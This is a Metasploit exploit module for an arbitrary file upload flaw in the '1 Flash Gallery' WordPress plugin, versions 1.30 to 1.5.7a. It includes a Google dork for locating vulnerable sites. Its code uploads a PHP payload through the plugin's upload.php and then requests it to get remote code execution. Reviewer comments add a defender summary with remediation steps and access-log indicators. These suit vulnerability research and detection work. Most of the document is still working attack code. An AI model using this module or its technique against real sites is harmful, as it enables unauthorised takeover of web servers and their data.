# Exploit Title: 1 Flash Gallery WordPress Plugin Arbitrary File Upload Exploit
#
# Google Dork:inurl:"wp-content/plugins/1-flash-gallery"
#
# Date: 09/06/2011
#
# Author: Ben Schmidt
#
# Software Link: http://downloads.wordpress.org/plugin/1-flash-gallery.1.5.6.zip
#
# Version: v1.30 to v1.5.7a (tested on 1.5.6 and 1.5.7 prior to patch)
#
# NOTE(review): vulnerability summary for defenders, derived from this module.
# The weakness is an unauthenticated file upload: the plugin's upload.php
# appears to take the stored file's extension from the `fileext` request
# parameter (see the request URI in #exploit), so a PHP file can be written
# under the web root and then requested directly. Remediation is upgrading the
# plugin beyond the versions in the Version line above and configuring the
# web server so that files in upload directories are never executed as
# scripts. In access logs this activity shows as a POST to
# /wp-content/plugins/1-flash-gallery/upload.php with
# action=uploadify&fileext=php, followed by a GET to the path the handler
# returned.

require 'msf/core'

# Metasploit module: uploads a PHP payload through the plugin's upload.php and
# then requests it once so the payload runs; the framework's handler is started
# afterward. Only #initialize (metadata/options) and #exploit are defined here.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # Both mixins are included, but as far as this file shows only
  # HttpClient#send_request_raw is used; nothing here calls the raw Tcp API.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata with the framework and declares the single
  # datastore option the module reads.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => '1 Flash Gallery WordPress Plugin File Upload Exploit',
      'Description'=> %q{ This module exploits an arbitrary file upload vulnerability in the '1 Flash Gallery' WordPress plugin. },
      'Author' => [ 'Ben Schmidt'],
      'License'=> MSF_LICENSE,
      'References' => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
      'Privileged' => false,
      'Payload'=> {
        'DisableNops' => true,
        # Arbitrary big number. The payload gets sent as an HTTP
        # POST request, so it's possible this might be smaller (maybe?)
        # but very unlikely.
        'Space' => 262144, # 256k
      },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      # A single automatic target: nothing in #exploit branches on target.
      'Targets'=> [[ 'Automatic', { }]],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sept 6, 2011'
    ))

    # URI is the WordPress base path (required, default "/"). #exploit appends
    # the plugin path to it verbatim, with no slash normalization.
    register_options([
      OptString.new('URI', [true, "Path to WordPress", "/"]),
    ], self.class)
  end

  # Builds one multipart/form-data POST carrying the encoded payload as a
  # ".php" file in the "Filedata" part, sends it to the plugin's upload.php,
  # then issues a GET for the path found in the response body and starts the
  # framework handler.
  #
  # Reads datastore['URI'] and payload.encoded; prints status/error messages.
  # Returns whatever `handler` returns.
  def exploit
    # Random multipart boundary and random base name for the uploaded file.
    boundary = rand_text_alphanumeric(6)
    fn = rand_text_alphanumeric(8)

    # Single-part body: the file part is named "Filedata", carries a .php
    # filename and an application/x-httpd-php content type, and contains the
    # encoded payload.
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
    data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n"
    data << payload.encoded
    data << "\r\n--#{boundary}--"

    # Upload request; 25 is the response timeout in seconds.
    res = send_request_raw({
      'uri' => datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
      'method'=> 'POST',
      'data'=> data,
      'headers' => {
        'Content-Type' => 'multipart/form-data; boundary=' + boundary,
        # String#length is a character count; it equals the byte count only
        # while the body is pure ASCII.
        'Content-Length' => data.length,
      }
    }, 25)

    # Only the presence of a response object is checked here: the HTTP status
    # and body format are not verified, so the success message is printed for
    # any response at all.
    if (res)
      print_status("Successfully uploaded shell.")
      # The text before the first "_" in the response body is used as the
      # uploaded file's path. NOTE(review): presumably upload.php echoes
      # "<path>_<something>" — confirm; an empty body makes shell_path nil.
      shell_path = res.body.split("_")[0]
      print_status("Trying to access shell at #{shell_path}...")
      # Trigger request with a 0.01 s timeout; the result is not used
      # afterward (res is simply overwritten before the handler starts).
      res = send_request_raw({
        'uri' => datastore['URI'] + shell_path,
        'method'=> 'GET',
      }, 0.01)
    else
      print_error("Error uploading shell")
    end

    # Hand off to the framework's payload handler regardless of the outcome
    # above.
    handler
  end
end